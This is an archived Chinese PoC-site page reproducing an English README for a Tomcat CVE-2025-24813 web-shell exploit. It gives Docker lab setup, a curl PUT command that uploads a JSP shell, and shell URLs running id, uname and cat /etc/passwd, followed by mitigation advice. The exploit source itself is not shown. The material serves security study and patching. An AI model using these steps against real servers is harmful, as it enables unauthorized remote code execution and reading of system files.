关联漏洞
标题:
Apache Tomcat 环境问题漏洞
(CVE-2025-24813)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 11.0.0-M1至11.0.2版本、10.1.0-M1至10.1.34版本和9.0.0.M1至9.0.98版本存在环境问题漏洞。攻击者利用该漏洞可以远程执行代码或泄露敏感信息。
描述
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
介绍
# 🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE Exploit
This repository contains a complete proof-of-concept (PoC) for **CVE-2025-24813**, a Remote Code Execution (RCE) vulnerability in Apache Tomcat using the HTTP PUT method to deploy a malicious JSP web shell.
> 🔥 This exploit demonstrates how an attacker can achieve **RCE** via file upload and payload execution in improperly secured Tomcat instances.
---
## 📁 Project Structure
```
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
```
---
## 🚀 Exploitation Steps
### 1️⃣ Setup Docker Environment
```bash
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
```
📸 
📸 
---
### 2️⃣ Upload Malicious JSP Shell
```bash
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
```
📸 
---
### 3️⃣ Execute Python Exploit
```bash
python3 exploit/1_exploit_cve_2025_24813.py
```
📸 
---
### 4️⃣ Interact with the Web Shell
```bash
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
```
📸 
📸 
📸 
📸 
📸 
---
## 🧩 Features
- 🔧 Docker-based setup of vulnerable Apache Tomcat server
- 📥 PUT method abuse to upload and trigger JSP web shells
- 🐍 Python-based PoC script
- 📸 Full screenshot-based walkthrough
- 📚 Ideal for red team simulation & education
---
## 🛠️ How to Patch (Mitigation)
- 🚫 Disable PUT/DELETE methods in `web.xml` or server config
- ⛓️ Use security manager or stricter servlet container controls
- 🔐 Apply file-level upload filters and validation
- 🧱 Set up WAF to block unauthorized PUT requests
- ✅ Upgrade to a **secure and patched version** of Apache Tomcat
---
## ⚠️ Disclaimer
> This project is for **educational and research purposes only**. Unauthorized testing, exploitation, or use on systems you do not own or have permission to test is illegal and unethical.
---
## 👨💻 Author
**Shivshant Patil**
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
🔗 [LinkedIn](https://www.linkedin.com/in/shivshant-patil-b58aaa281)
🔗 [GitHub](https://github.com/Shivshantp)
---
文件快照
[4.0K] /data/pocs/5e83d9f1ccac090ae41f615e43dd29ccedf89e96
├── [4.0K] docker
│ ├── [ 486] Dockerfile
│ └── [169K] web.xml
├── [4.0K] exploit
│ ├── [1.1K] 1. exploit_cve_2025_24813.py
│ └── [ 469] 2. shell.jsp
├── [1.0K] LICENSE
├── [3.6K] README.md
└── [4.0K] screenshots
├── [ 53K] 1_tomcat_running.png
├── [316K] 2_docker_started.png
├── [ 57K] 3_upload_shell_jsp.png
├── [124K] 4_run_python_exploit.png
├── [ 30K] 5_access_shell_whoami.png
├── [ 84K] 6_view_etc_passwd.png
├── [ 37K] 7_run_uname_a.png
├── [ 23K] 8_run_id.png
└── [ 22K] 9_run_pwd.png
3 directories, 15 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。